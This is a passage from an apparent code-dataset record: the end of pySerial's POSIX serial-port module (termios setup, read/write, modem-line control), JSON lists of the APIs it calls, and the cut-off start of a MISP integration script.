set_special_baudrate(port, baudrate):\n raise ValueError(\"baud rate not supported\")\n\n def device(port):\n return '/dev/cuad%d' % port\n\n baudrate_constants = {}\n\n\nelif plat[:6] == 'netbsd': # NetBSD 1.6 testing by Erk\n\n def device(port):\n return '/dev/dty%02d' % port\n\n def set_special_baudrate(port, baudrate):\n raise ValueError(\"sorry don't know how to handle non standard baud rate on this platform\")\n\n baudrate_constants = {}\n\nelif plat[:4] == 'irix': # IRIX (partially tested)\n\n def device(port):\n return '/dev/ttyf%d' % (port+1) #XXX different device names depending on flow control\n\n def set_special_baudrate(port, baudrate):\n raise ValueError(\"sorry don't know how to handle non standard baud rate on this platform\")\n\n baudrate_constants = {}\n\nelif plat[:2] == 'hp': # HP-UX (not tested)\n\n def device(port):\n return '/dev/tty%dp0' % (port+1)\n\n def set_special_baudrate(port, baudrate):\n raise ValueError(\"sorry don't know how to handle non standard baud rate on this platform\")\n\n baudrate_constants = {}\n\nelif plat[:5] == 'sunos': # Solaris/SunOS (confirmed)\n\n def device(port):\n return 
'/dev/tty%c' % (ord('a')+port)\n\n def set_special_baudrate(port, baudrate):\n raise ValueError(\"sorry don't know how to handle non standard baud rate on this platform\")\n\n baudrate_constants = {}\n\nelif plat[:3] == 'aix': # AIX\n\n def device(port):\n return '/dev/tty%d' % (port)\n\n def set_special_baudrate(port, baudrate):\n raise ValueError(\"sorry don't know how to handle non standard baud rate on this platform\")\n\n baudrate_constants = {}\n\nelse:\n # platform detection has failed...\n sys.stderr.write(\"\"\"\\\ndon't know how to number ttys on this system.\n! Use an explicit path (eg /dev/ttyS1) or send this information to\n! the author of this module:\n\nsys.platform = %r\nos.name = %r\nserialposix.py version = %s\n\nalso add the device name of the serial port and where the\ncounting starts for the first serial port.\ne.g. 'first serial port: /dev/ttyS0'\nand with a bit luck you can get this module running...\n\"\"\" % (sys.platform, os.name, VERSION))\n # no exception, just continue with a brave attempt to build a device name\n # even if the device name is not correct for the platform it has chances\n # to work using a string with the real device name as port parameter.\n def device(portum):\n return '/dev/ttyS%d' % portnum\n def set_special_baudrate(port, baudrate):\n raise SerialException(\"sorry don't know how to handle non standard baud rate on this platform\")\n baudrate_constants = {}\n #~ raise Exception, \"this module does not run on this platform, sorry.\"\n\n# whats up with \"aix\", \"beos\", ....\n# they should work, just need to know the device names.\n\n\n# load some constants for later use.\n# try to use values from TERMIOS, use defaults from linux otherwise\nTIOCMGET = hasattr(TERMIOS, 'TIOCMGET') and TERMIOS.TIOCMGET or 0x5415\nTIOCMBIS = hasattr(TERMIOS, 'TIOCMBIS') and TERMIOS.TIOCMBIS or 0x5416\nTIOCMBIC = hasattr(TERMIOS, 'TIOCMBIC') and TERMIOS.TIOCMBIC or 0x5417\nTIOCMSET = hasattr(TERMIOS, 'TIOCMSET') and TERMIOS.TIOCMSET or 0x5418\n\n#TIOCM_LE = hasattr(TERMIOS, 'TIOCM_LE') and TERMIOS.TIOCM_LE or 0x001\nTIOCM_DTR = hasattr(TERMIOS, 'TIOCM_DTR') and TERMIOS.TIOCM_DTR or 0x002\nTIOCM_RTS = hasattr(TERMIOS, 'TIOCM_RTS') and TERMIOS.TIOCM_RTS or 0x004\n#TIOCM_ST = hasattr(TERMIOS, 'TIOCM_ST') and TERMIOS.TIOCM_ST or 0x008\n#TIOCM_SR = hasattr(TERMIOS, 'TIOCM_SR') and TERMIOS.TIOCM_SR or 0x010\n\nTIOCM_CTS = hasattr(TERMIOS, 'TIOCM_CTS') and TERMIOS.TIOCM_CTS or 0x020\nTIOCM_CAR = hasattr(TERMIOS, 'TIOCM_CAR') and TERMIOS.TIOCM_CAR or 0x040\nTIOCM_RNG = hasattr(TERMIOS, 'TIOCM_RNG') and TERMIOS.TIOCM_RNG or 0x080\nTIOCM_DSR = hasattr(TERMIOS, 'TIOCM_DSR') and TERMIOS.TIOCM_DSR or 0x100\nTIOCM_CD = hasattr(TERMIOS, 'TIOCM_CD') and TERMIOS.TIOCM_CD or TIOCM_CAR\nTIOCM_RI = hasattr(TERMIOS, 'TIOCM_RI') and TERMIOS.TIOCM_RI or TIOCM_RNG\n#TIOCM_OUT1 = hasattr(TERMIOS, 'TIOCM_OUT1') and TERMIOS.TIOCM_OUT1 or 0x2000\n#TIOCM_OUT2 = hasattr(TERMIOS, 'TIOCM_OUT2') and TERMIOS.TIOCM_OUT2 or 0x4000\nTIOCINQ = hasattr(TERMIOS, 'FIONREAD') and TERMIOS.FIONREAD or 0x541B\n\nTIOCM_zero_str = struct.pack('I', 0)\nTIOCM_RTS_str = struct.pack('I', TIOCM_RTS)\nTIOCM_DTR_str = struct.pack('I', TIOCM_DTR)\n\nTIOCSBRK = hasattr(TERMIOS, 'TIOCSBRK') and TERMIOS.TIOCSBRK or 0x5427\nTIOCCBRK = hasattr(TERMIOS, 'TIOCCBRK') and TERMIOS.TIOCCBRK or 0x5428\n\n\nclass PosixSerial(SerialBase):\n \"\"\"Serial port class POSIX implementation. Serial port configuration is \n done with termios and fcntl. 
Runs on Linux and many other Un*x like\n systems.\"\"\"\n\n def open(self):\n \"\"\"Open port with current settings. This may throw a SerialException\n if the port cannot be opened.\"\"\"\n self.fd = None\n if self._port is None:\n raise SerialException(\"Port must be configured before it can be used.\")\n # open\n try:\n self.fd = os.open(self.portstr, os.O_RDWR|os.O_NOCTTY|os.O_NONBLOCK)\n except Exception as msg:\n self.fd = None\n raise SerialException(\"could not open port %s: %s\" % (self._port, msg))\n #~ fcntl.fcntl(self.fd, FCNTL.F_SETFL, 0) # set blocking\n\n try:\n self._reconfigurePort()\n except:\n try:\n os.close(self.fd)\n except:\n # ignore any exception when closing the port\n # also to keep original exception that happened when setting up\n pass\n self.fd = None\n raise\n else:\n self._isOpen = True\n #~ self.flushInput()\n\n\n def _reconfigurePort(self):\n \"\"\"Set communication parameters on opened port.\"\"\"\n if self.fd is None:\n raise SerialException(\"Can only operate on a valid file descriptor\")\n custom_baud = None\n\n vmin = vtime = 0 # timeout is done via select\n if self._interCharTimeout is not None:\n vmin = 1\n vtime = int(self._interCharTimeout * 10)\n try:\n iflag, oflag, cflag, lflag, ispeed, ospeed, cc = termios.tcgetattr(self.fd)\n except termios.error as msg: # if a port is nonexistent but has a /dev file, it'll fail here\n raise SerialException(\"Could not configure port: %s\" % msg)\n # set up raw mode / no echo / binary\n cflag |= (TERMIOS.CLOCAL|TERMIOS.CREAD)\n lflag &= ~(TERMIOS.ICANON|TERMIOS.ECHO|TERMIOS.ECHOE|TERMIOS.ECHOK|TERMIOS.ECHONL|\n TERMIOS.ISIG|TERMIOS.IEXTEN) #|TERMIOS.ECHOPRT\n for flag in ('ECHOCTL', 'ECHOKE'): # netbsd workaround for Erk\n if hasattr(TERMIOS, flag):\n lflag &= ~getattr(TERMIOS, flag)\n\n oflag &= ~(TERMIOS.OPOST)\n iflag &= ~(TERMIOS.INLCR|TERMIOS.IGNCR|TERMIOS.ICRNL|TERMIOS.IGNBRK)\n if hasattr(TERMIOS, 'IUCLC'):\n iflag &= ~TERMIOS.IUCLC\n if hasattr(TERMIOS, 'PARMRK'):\n iflag &= ~TERMIOS.PARMRK\n\n # setup baud rate\n try:\n ispeed = ospeed = getattr(TERMIOS, 'B%s' % (self._baudrate))\n except AttributeError:\n try:\n ispeed = ospeed = baudrate_constants[self._baudrate]\n except KeyError:\n #~ raise ValueError('Invalid baud rate: %r' % self._baudrate)\n # may need custom baud rate, it isn't in our list.\n ispeed = ospeed = getattr(TERMIOS, 'B38400')\n try:\n custom_baud = int(self._baudrate) # store for later\n except ValueError:\n raise ValueError('Invalid baud rate: %r' % self._baudrate)\n else:\n if custom_baud < 0:\n raise ValueError('Invalid baud rate: %r' % self._baudrate)\n\n # setup char len\n cflag &= ~TERMIOS.CSIZE\n if self._bytesize == 8:\n cflag |= TERMIOS.CS8\n elif self._bytesize == 7:\n cflag |= TERMIOS.CS7\n elif self._bytesize == 6:\n cflag |= TERMIOS.CS6\n elif self._bytesize == 5:\n cflag |= TERMIOS.CS5\n else:\n raise ValueError('Invalid char len: %r' % self._bytesize)\n # setup stopbits\n if self._stopbits == STOPBITS_ONE:\n cflag &= ~(TERMIOS.CSTOPB)\n elif self._stopbits == STOPBITS_ONE_POINT_FIVE:\n cflag |= (TERMIOS.CSTOPB) # XXX same as TWO.. 
there is no POSIX support for 1.5\n elif self._stopbits == STOPBITS_TWO:\n cflag |= (TERMIOS.CSTOPB)\n else:\n raise ValueError('Invalid stop bit specification: %r' % self._stopbits)\n # setup parity\n iflag &= ~(TERMIOS.INPCK|TERMIOS.ISTRIP)\n if self._parity == PARITY_NONE:\n cflag &= ~(TERMIOS.PARENB|TERMIOS.PARODD)\n elif self._parity == PARITY_EVEN:\n cflag &= ~(TERMIOS.PARODD)\n cflag |= (TERMIOS.PARENB)\n elif self._parity == PARITY_ODD:\n cflag |= (TERMIOS.PARENB|TERMIOS.PARODD)\n else:\n raise ValueError('Invalid parity: %r' % self._parity)\n # setup flow control\n # xonxoff\n if hasattr(TERMIOS, 'IXANY'):\n if self._xonxoff:\n iflag |= (TERMIOS.IXON|TERMIOS.IXOFF) #|TERMIOS.IXANY)\n else:\n iflag &= ~(TERMIOS.IXON|TERMIOS.IXOFF|TERMIOS.IXANY)\n else:\n if self._xonxoff:\n iflag |= (TERMIOS.IXON|TERMIOS.IXOFF)\n else:\n iflag &= ~(TERMIOS.IXON|TERMIOS.IXOFF)\n # rtscts\n if hasattr(TERMIOS, 'CRTSCTS'):\n if self._rtscts:\n cflag |= (TERMIOS.CRTSCTS)\n else:\n cflag &= ~(TERMIOS.CRTSCTS)\n elif hasattr(TERMIOS, 'CNEW_RTSCTS'): # try it with alternate constant name\n if self._rtscts:\n cflag |= (TERMIOS.CNEW_RTSCTS)\n else:\n cflag &= ~(TERMIOS.CNEW_RTSCTS)\n # XXX should there be a warning if setting up rtscts (and xonxoff etc) fails??\n\n # buffer\n # vmin \"minimal number of characters to be read. = for non blocking\"\n if vmin < 0 or vmin > 255:\n raise ValueError('Invalid vmin: %r ' % vmin)\n cc[TERMIOS.VMIN] = vmin\n # vtime\n if vtime < 0 or vtime > 255:\n raise ValueError('Invalid vtime: %r' % vtime)\n cc[TERMIOS.VTIME] = vtime\n # activate settings\n termios.tcsetattr(self.fd, TERMIOS.TCSANOW, [iflag, oflag, cflag, lflag, ispeed, ospeed, cc])\n\n # apply custom baud rate, if any\n if custom_baud is not None:\n set_special_baudrate(self, custom_baud)\n\n def close(self):\n \"\"\"Close port\"\"\"\n if self._isOpen:\n if self.fd is not None:\n os.close(self.fd)\n self.fd = None\n self._isOpen = False\n\n def makeDeviceName(self, port):\n return device(port)\n\n # - - - - - - - - - - - - - - - - - - - - - - - -\n\n def inWaiting(self):\n \"\"\"Return the number of characters currently in the input buffer.\"\"\"\n #~ s = fcntl.ioctl(self.fd, TERMIOS.FIONREAD, TIOCM_zero_str)\n s = fcntl.ioctl(self.fd, TIOCINQ, TIOCM_zero_str)\n return struct.unpack('I',s)[0]\n\n # select based implementation, proved to work on many systems\n def read(self, size=1):\n \"\"\"Read size bytes from the serial port. If a timeout is set it may\n return less characters as requested. 
With no timeout it will block\n until the requested number of bytes is read.\"\"\"\n if self.fd is None: raise portNotOpenError\n read = bytearray()\n while len(read) < size:\n ready,_,_ = select.select([self.fd],[],[], self._timeout)\n # If select was used with a timeout, and the timeout occurs, it\n # returns with empty lists -> thus abort read operation.\n # For timeout == 0 (non-blocking operation) also abort when there\n # is nothing to read.\n if not ready:\n break # timeout\n buf = os.read(self.fd, size-len(read))\n # read should always return some data as select reported it was\n # ready to read when we get to this point.\n if not buf:\n # Disconnected devices, at least on Linux, show the\n # behavior that they are always ready to read immediately\n # but reading returns nothing.\n raise SerialException('device reports readiness to read but returned no data (device disconnected?)')\n read.extend(buf)\n return bytes(read)\n\n def write(self, data):\n \"\"\"Output the given string over the serial port.\"\"\"\n if self.fd is None: raise portNotOpenError\n t = len(data)\n d = data\n if self._writeTimeout is not None and self._writeTimeout > 0:\n timeout = time.time() + self._writeTimeout\n else:\n timeout = None\n while t > 0:\n try:\n n = os.write(self.fd, d)\n if timeout:\n # when timeout is set, use select to wait for being ready\n # with the time left as timeout\n timeleft = timeout - time.time()\n if timeleft < 0:\n raise writeTimeoutError\n _, ready, _ = select.select([], [self.fd], [], timeleft)\n if not ready:\n raise writeTimeoutError\n d = d[n:]\n t = t - n\n except OSError as v:\n if v.errno != errno.EAGAIN:\n raise SerialException('write failed: %s' % (v,))\n return len(data)\n\n def flush(self):\n \"\"\"Flush of file like objects. In this case, wait until all data\n is written.\"\"\"\n self.drainOutput()\n\n def flushInput(self):\n \"\"\"Clear input buffer, discarding all that is in the buffer.\"\"\"\n if self.fd is None:\n raise portNotOpenError\n termios.tcflush(self.fd, TERMIOS.TCIFLUSH)\n\n def flushOutput(self):\n \"\"\"Clear output buffer, aborting the current output and\n discarding all that is in the buffer.\"\"\"\n if self.fd is None:\n raise portNotOpenError\n termios.tcflush(self.fd, TERMIOS.TCOFLUSH)\n\n def sendBreak(self, duration=0.25):\n \"\"\"Send break condition. Timed, returns to idle state after given duration.\"\"\"\n if self.fd is None:\n raise portNotOpenError\n termios.tcsendbreak(self.fd, int(duration/0.25))\n\n def setBreak(self, level=1):\n \"\"\"Set break: Controls TXD. 
When active, no transmitting is possible.\"\"\"\n if self.fd is None: raise portNotOpenError\n if level:\n fcntl.ioctl(self.fd, TIOCSBRK)\n else:\n fcntl.ioctl(self.fd, TIOCCBRK)\n\n def setRTS(self, level=1):\n \"\"\"Set terminal status line: Request To Send\"\"\"\n if self.fd is None: raise portNotOpenError\n if level:\n fcntl.ioctl(self.fd, TIOCMBIS, TIOCM_RTS_str)\n else:\n fcntl.ioctl(self.fd, TIOCMBIC, TIOCM_RTS_str)\n\n def setDTR(self, level=1):\n \"\"\"Set terminal status line: Data Terminal Ready\"\"\"\n if self.fd is None: raise portNotOpenError\n if level:\n fcntl.ioctl(self.fd, TIOCMBIS, TIOCM_DTR_str)\n else:\n fcntl.ioctl(self.fd, TIOCMBIC, TIOCM_DTR_str)\n\n def getCTS(self):\n \"\"\"Read terminal status line: Clear To Send\"\"\"\n if self.fd is None: raise portNotOpenError\n s = fcntl.ioctl(self.fd, TIOCMGET, TIOCM_zero_str)\n return struct.unpack('I',s)[0] & TIOCM_CTS != 0\n\n def getDSR(self):\n \"\"\"Read terminal status line: Data Set Ready\"\"\"\n if self.fd is None: raise portNotOpenError\n s = fcntl.ioctl(self.fd, TIOCMGET, TIOCM_zero_str)\n return struct.unpack('I',s)[0] & TIOCM_DSR != 0\n\n def getRI(self):\n \"\"\"Read terminal status line: Ring Indicator\"\"\"\n if self.fd is None: raise portNotOpenError\n s = fcntl.ioctl(self.fd, TIOCMGET, TIOCM_zero_str)\n return struct.unpack('I',s)[0] & TIOCM_RI != 0\n\n def getCD(self):\n \"\"\"Read terminal status line: Carrier Detect\"\"\"\n if self.fd is None: raise portNotOpenError\n s = fcntl.ioctl(self.fd, TIOCMGET, TIOCM_zero_str)\n return struct.unpack('I',s)[0] & TIOCM_CD != 0\n\n # - - platform specific - - - -\n\n def drainOutput(self):\n \"\"\"internal - not portable!\"\"\"\n if self.fd is None: raise portNotOpenError\n termios.tcdrain(self.fd)\n\n def nonblocking(self):\n \"\"\"internal - not portable!\"\"\"\n if self.fd is None:\n raise portNotOpenError\n fcntl.fcntl(self.fd, FCNTL.F_SETFL, os.O_NONBLOCK)\n\n def fileno(self):\n \"\"\"For easier use of the serial port instance with select.\n WARNING: this function is not portable to different platforms!\"\"\"\n if self.fd is None: raise portNotOpenError\n return self.fd\n\n def flowControl(self, enable):\n \"\"\"manually control flow - when hardware or software flow control is\n enabled\"\"\"\n if enable:\n termios.tcflow(self.fd, TERMIOS.TCION)\n else:\n termios.tcflow(self.fd, TERMIOS.TCIOFF)\n\n\n# assemble Serial class with the platform specifc implementation and the base\n# for file-like behavior. for Python 2.6 and newer, that provide the new I/O\n# library, derrive from io.RawIOBase\ntry:\n import io\nexcept ImportError:\n # classic version with our own file-like emulation\n class Serial(PosixSerial, FileLike):\n pass\nelse:\n # io library present\n class Serial(PosixSerial, io.RawIOBase):\n pass\n\nclass PosixPollSerial(Serial):\n \"\"\"poll based read implementation. not all systems support poll properly.\n however this one has better handling of errors, such as a device\n disconnecting while it's in use (e.g. USB-serial unplugged)\"\"\"\n\n def read(self, size=1):\n \"\"\"Read size bytes from the serial port. If a timeout is set it may\n return less characters as requested. 
With no timeout it will block\n until the requested number of bytes is read.\"\"\"\n if self.fd is None: raise portNotOpenError\n read = bytearray()\n poll = select.poll()\n poll.register(self.fd, select.POLLIN|select.POLLERR|select.POLLHUP|select.POLLNVAL)\n if size > 0:\n while len(read) < size:\n # print \"\\tread(): size\",size, \"have\", len(read) #debug\n # wait until device becomes ready to read (or something fails)\n for fd, event in poll.poll(self._timeout*1000):\n if event & (select.POLLERR|select.POLLHUP|select.POLLNVAL):\n raise SerialException('device reports error (poll)')\n # we don't care if it is select.POLLIN or timeout, that's\n # handled below\n buf = os.read(self.fd, size - len(read))\n read.extend(buf)\n if ((self._timeout is not None and self._timeout >= 0) or \n (self._interCharTimeout is not None and self._interCharTimeout > 0)) and not buf:\n break # early abort on timeout\n return bytes(read)\n\n\nif __name__ == '__main__':\n s = Serial(0,\n baudrate=19200, # baud rate\n bytesize=EIGHTBITS, # number of data bits\n parity=PARITY_EVEN, # enable parity checking\n stopbits=STOPBITS_ONE, # number of stop bits\n timeout=3, # set a timeout value, None for waiting forever\n xonxoff=0, # enable software flow control\n rtscts=0, # enable RTS/CTS flow control\n )\n s.setRTS(1)\n s.setDTR(1)\n s.flushInput()\n s.flushOutput()\n s.write('hello')\n sys.stdout.write('%r\\n' % s.read(5))\n sys.stdout.write('%s\\n' % s.inWaiting())\n del s\n\n"},"apis":{"kind":"list like","value":["os.open","fcntl.fcntl","termios.tcflush","select.poll","termios.tcflow","termios.tcdrain","termios.tcsetattr","FCNTL.ioctl","os.uname","select.select","array.array","os.close","os.write","struct.pack","sys.stderr.write","struct.unpack","time.time","sys.platform.lower","fcntl.ioctl","termios.tcgetattr"],"string":"[\n \"os.open\",\n \"fcntl.fcntl\",\n \"termios.tcflush\",\n \"select.poll\",\n \"termios.tcflow\",\n \"termios.tcdrain\",\n \"termios.tcsetattr\",\n \"FCNTL.ioctl\",\n \"os.uname\",\n \"select.select\",\n \"array.array\",\n \"os.close\",\n \"os.write\",\n \"struct.pack\",\n \"sys.stderr.write\",\n \"struct.unpack\",\n \"time.time\",\n \"sys.platform.lower\",\n \"fcntl.ioctl\",\n \"termios.tcgetattr\"\n]"},"extract_api":{"kind":"string","value":"[((909, 929), 'sys.platform.lower', 'sys.platform.lower', ([], {}), '()\\n', (927, 929), False, 'import sys, os, fcntl, termios, struct, select, errno, time\\n'), ((8255, 8274), 'struct.pack', 'struct.pack', (['\"\"\"I\"\"\"', '(0)'], {}), \"('I', 0)\\n\", (8266, 8274), False, 'import sys, os, fcntl, termios, struct, select, errno, time\\n'), ((8291, 8318), 'struct.pack', 'struct.pack', (['\"\"\"I\"\"\"', 'TIOCM_RTS'], {}), \"('I', TIOCM_RTS)\\n\", (8302, 8318), False, 'import sys, os, fcntl, termios, struct, select, errno, time\\n'), ((8335, 8362), 'struct.pack', 'struct.pack', (['\"\"\"I\"\"\"', 'TIOCM_DTR'], {}), \"('I', TIOCM_DTR)\\n\", (8346, 8362), False, 'import sys, os, fcntl, termios, struct, select, errno, time\\n'), ((1178, 1204), 'array.array', 'array.array', (['\"\"\"i\"\"\"', '([0] * 32)'], {}), \"('i', [0] * 32)\\n\", (1189, 1204), False, 'import array, fcntl\\n'), ((1242, 1288), 'FCNTL.ioctl', 'FCNTL.ioctl', (['port.fd', 'TERMIOS.TIOCGSERIAL', 'buf'], {}), '(port.fd, TERMIOS.TIOCGSERIAL, buf)\\n', (1253, 1288), False, 'import FCNTL\\n'), ((14576, 14673), 'termios.tcsetattr', 'termios.tcsetattr', (['self.fd', 'TERMIOS.TCSANOW', '[iflag, oflag, cflag, lflag, ispeed, ospeed, cc]'], {}), '(self.fd, TERMIOS.TCSANOW, [iflag, oflag, cflag, 
lflag,\\n ispeed, ospeed, cc])\\n', (14593, 14673), False, 'import sys, os, fcntl, termios, struct, select, errno, time\\n'), ((15335, 15380), 'fcntl.ioctl', 'fcntl.ioctl', (['self.fd', 'TIOCINQ', 'TIOCM_zero_str'], {}), '(self.fd, TIOCINQ, TIOCM_zero_str)\\n', (15346, 15380), False, 'import array, fcntl\\n'), ((18213, 18255), 'termios.tcflush', 'termios.tcflush', (['self.fd', 'TERMIOS.TCIFLUSH'], {}), '(self.fd, TERMIOS.TCIFLUSH)\\n', (18228, 18255), False, 'import sys, os, fcntl, termios, struct, select, errno, time\\n'), ((18468, 18510), 'termios.tcflush', 'termios.tcflush', (['self.fd', 'TERMIOS.TCOFLUSH'], {}), '(self.fd, TERMIOS.TCOFLUSH)\\n', (18483, 18510), False, 'import sys, os, fcntl, termios, struct, select, errno, time\\n'), ((19762, 19808), 'fcntl.ioctl', 'fcntl.ioctl', (['self.fd', 'TIOCMGET', 'TIOCM_zero_str'], {}), '(self.fd, TIOCMGET, TIOCM_zero_str)\\n', (19773, 19808), False, 'import array, fcntl\\n'), ((20007, 20053), 'fcntl.ioctl', 'fcntl.ioctl', (['self.fd', 'TIOCMGET', 'TIOCM_zero_str'], {}), '(self.fd, TIOCMGET, TIOCM_zero_str)\\n', (20018, 20053), False, 'import array, fcntl\\n'), ((20251, 20297), 'fcntl.ioctl', 'fcntl.ioctl', (['self.fd', 'TIOCMGET', 'TIOCM_zero_str'], {}), '(self.fd, TIOCMGET, TIOCM_zero_str)\\n', (20262, 20297), False, 'import array, fcntl\\n'), ((20494, 20540), 'fcntl.ioctl', 'fcntl.ioctl', (['self.fd', 'TIOCMGET', 'TIOCM_zero_str'], {}), '(self.fd, TIOCMGET, TIOCM_zero_str)\\n', (20505, 20540), False, 'import array, fcntl\\n'), ((20759, 20783), 'termios.tcdrain', 'termios.tcdrain', (['self.fd'], {}), '(self.fd)\\n', (20774, 20783), False, 'import sys, os, fcntl, termios, struct, select, errno, time\\n'), ((20922, 20972), 'fcntl.fcntl', 'fcntl.fcntl', (['self.fd', 'FCNTL.F_SETFL', 'os.O_NONBLOCK'], {}), '(self.fd, FCNTL.F_SETFL, os.O_NONBLOCK)\\n', (20933, 20972), False, 'import array, fcntl\\n'), ((22494, 22507), 'select.poll', 'select.poll', ([], {}), '()\\n', (22505, 22507), False, 'import sys, os, fcntl, termios, struct, select, errno, time\\n'), ((1505, 1551), 'FCNTL.ioctl', 'FCNTL.ioctl', (['port.fd', 'TERMIOS.TIOCSSERIAL', 'buf'], {}), '(port.fd, TERMIOS.TIOCSSERIAL, buf)\\n', (1516, 1551), False, 'import FCNTL\\n'), ((9036, 9098), 'os.open', 'os.open', (['self.portstr', '(os.O_RDWR | os.O_NOCTTY | os.O_NONBLOCK)'], {}), '(self.portstr, os.O_RDWR | os.O_NOCTTY | os.O_NONBLOCK)\\n', (9043, 9098), False, 'import sys, os, fcntl, termios, struct, select, errno, time\\n'), ((10218, 10244), 'termios.tcgetattr', 'termios.tcgetattr', (['self.fd'], {}), '(self.fd)\\n', (10235, 10244), False, 'import sys, os, fcntl, termios, struct, select, errno, time\\n'), ((15396, 15417), 'struct.unpack', 'struct.unpack', (['\"\"\"I\"\"\"', 's'], {}), \"('I', s)\\n\", (15409, 15417), False, 'import sys, os, fcntl, termios, struct, select, errno, time\\n'), ((15862, 15909), 'select.select', 'select.select', (['[self.fd]', '[]', '[]', 'self._timeout'], {}), '([self.fd], [], [], self._timeout)\\n', (15875, 15909), False, 'import sys, os, fcntl, termios, struct, select, errno, time\\n'), ((18955, 18985), 'fcntl.ioctl', 'fcntl.ioctl', (['self.fd', 'TIOCSBRK'], {}), '(self.fd, TIOCSBRK)\\n', (18966, 18985), False, 'import array, fcntl\\n'), ((19012, 19042), 'fcntl.ioctl', 'fcntl.ioctl', (['self.fd', 'TIOCCBRK'], {}), '(self.fd, TIOCCBRK)\\n', (19023, 19042), False, 'import array, fcntl\\n'), ((19212, 19257), 'fcntl.ioctl', 'fcntl.ioctl', (['self.fd', 'TIOCMBIS', 'TIOCM_RTS_str'], {}), '(self.fd, TIOCMBIS, TIOCM_RTS_str)\\n', (19223, 19257), False, 'import array, 
fcntl\\n'), ((19284, 19329), 'fcntl.ioctl', 'fcntl.ioctl', (['self.fd', 'TIOCMBIC', 'TIOCM_RTS_str'], {}), '(self.fd, TIOCMBIC, TIOCM_RTS_str)\\n', (19295, 19329), False, 'import array, fcntl\\n'), ((19503, 19548), 'fcntl.ioctl', 'fcntl.ioctl', (['self.fd', 'TIOCMBIS', 'TIOCM_DTR_str'], {}), '(self.fd, TIOCMBIS, TIOCM_DTR_str)\\n', (19514, 19548), False, 'import array, fcntl\\n'), ((19575, 19620), 'fcntl.ioctl', 'fcntl.ioctl', (['self.fd', 'TIOCMBIC', 'TIOCM_DTR_str'], {}), '(self.fd, TIOCMBIC, TIOCM_DTR_str)\\n', (19586, 19620), False, 'import array, fcntl\\n'), ((21377, 21415), 'termios.tcflow', 'termios.tcflow', (['self.fd', 'TERMIOS.TCION'], {}), '(self.fd, TERMIOS.TCION)\\n', (21391, 21415), False, 'import sys, os, fcntl, termios, struct, select, errno, time\\n'), ((21442, 21481), 'termios.tcflow', 'termios.tcflow', (['self.fd', 'TERMIOS.TCIOFF'], {}), '(self.fd, TERMIOS.TCIOFF)\\n', (21456, 21481), False, 'import sys, os, fcntl, termios, struct, select, errno, time\\n'), ((14924, 14941), 'os.close', 'os.close', (['self.fd'], {}), '(self.fd)\\n', (14932, 14941), False, 'import sys, os, fcntl, termios, struct, select, errno, time\\n'), ((17064, 17075), 'time.time', 'time.time', ([], {}), '()\\n', (17073, 17075), False, 'import sys, os, fcntl, termios, struct, select, errno, time\\n'), ((17196, 17216), 'os.write', 'os.write', (['self.fd', 'd'], {}), '(self.fd, d)\\n', (17204, 17216), False, 'import sys, os, fcntl, termios, struct, select, errno, time\\n'), ((9404, 9421), 'os.close', 'os.close', (['self.fd'], {}), '(self.fd)\\n', (9412, 9421), False, 'import sys, os, fcntl, termios, struct, select, errno, time\\n'), ((17547, 17589), 'select.select', 'select.select', (['[]', '[self.fd]', '[]', 'timeleft'], {}), '([], [self.fd], [], timeleft)\\n', (17560, 17589), False, 'import sys, os, fcntl, termios, struct, select, errno, time\\n'), ((19824, 19845), 'struct.unpack', 'struct.unpack', (['\"\"\"I\"\"\"', 's'], {}), \"('I', s)\\n\", (19837, 19845), False, 'import sys, os, fcntl, termios, struct, select, errno, time\\n'), ((20069, 20090), 'struct.unpack', 'struct.unpack', (['\"\"\"I\"\"\"', 's'], {}), \"('I', s)\\n\", (20082, 20090), False, 'import sys, os, fcntl, termios, struct, select, errno, time\\n'), ((20313, 20334), 'struct.unpack', 'struct.unpack', (['\"\"\"I\"\"\"', 's'], {}), \"('I', s)\\n\", (20326, 20334), False, 'import sys, os, fcntl, termios, struct, select, errno, time\\n'), ((20556, 20577), 'struct.unpack', 'struct.unpack', (['\"\"\"I\"\"\"', 's'], {}), \"('I', s)\\n\", (20569, 20577), False, 'import sys, os, fcntl, termios, struct, select, errno, time\\n'), ((17416, 17427), 'time.time', 'time.time', ([], {}), '()\\n', (17425, 17427), False, 'import sys, os, fcntl, termios, struct, select, errno, time\\n'), ((3798, 3826), 'array.array', 'array.array', (['\"\"\"i\"\"\"', '[baudrate]'], {}), \"('i', [baudrate])\\n\", (3809, 3826), False, 'import array, fcntl\\n'), ((3899, 3940), 'fcntl.ioctl', 'fcntl.ioctl', (['port.fd', 'IOSSIOSPEED', 'buf', '(1)'], {}), '(port.fd, IOSSIOSPEED, buf, 1)\\n', (3910, 3940), False, 'import array, fcntl\\n'), ((3527, 3537), 'os.uname', 'os.uname', ([], {}), '()\\n', (3535, 3537), False, 'import sys, os, fcntl, termios, struct, select, errno, time\\n'), ((5714, 6179), 'sys.stderr.write', 'sys.stderr.write', (['(\"\"\"don\\'t know how to number ttys on this system.\\n! Use an explicit path (eg /dev/ttyS1) or send this information to\\n! 
the author of this module:\\n\\nsys.platform = %r\\nos.name = %r\\nserialposix.py version = %s\\n\\nalso add the device name of the serial port and where the\\ncounting starts for the first serial port.\\ne.g. \\'first serial port: /dev/ttyS0\\'\\nand with a bit luck you can get this module running...\\n\"\"\"\\n % (sys.platform, os.name, VERSION))'], {}), '(\\n \"\"\"don\\'t know how to number ttys on this system.\\n! Use an explicit path (eg /dev/ttyS1) or send this information to\\n! the author of this module:\\n\\nsys.platform = %r\\nos.name = %r\\nserialposix.py version = %s\\n\\nalso add the device name of the serial port and where the\\ncounting starts for the first serial port.\\ne.g. \\'first serial port: /dev/ttyS0\\'\\nand with a bit luck you can get this module running...\\n\"\"\"\\n % (sys.platform, os.name, VERSION))\\n', (5730, 6179), False, 'import sys, os, fcntl, termios, struct, select, errno, time\\n')]"}}},{"rowIdx":718,"cells":{"code":{"kind":"string","value":"# type: ignore\nfrom typing import Union, List, Dict\nfrom urllib.parse import urlparse\nimport urllib3\n\nfrom pymisp import ExpandedPyMISP, PyMISPError, MISPObject, MISPSighting, MISPEvent, MISPAttribute\nfrom pymisp.tools import GenericObjectGenerator\nimport copy\nfrom pymisp.tools import FileObject\n\nfrom CommonServerPython import *\n\nlogging.getLogger(\"pymisp\").setLevel(logging.CRITICAL)\n\n\ndef handle_connection_errors(error):\n if \"SSLError\" in error:\n return_error('Unable to connect to MISP because of a SSLCertVerificationError, '\n 'Please try to use the Trust any certificate option.')\n if \"NewConnectionError\" in error:\n return_error('Unable to connect to MISP because of a NewConnectionError, '\n 'Please make sure your MISP server url is correct.')\n if 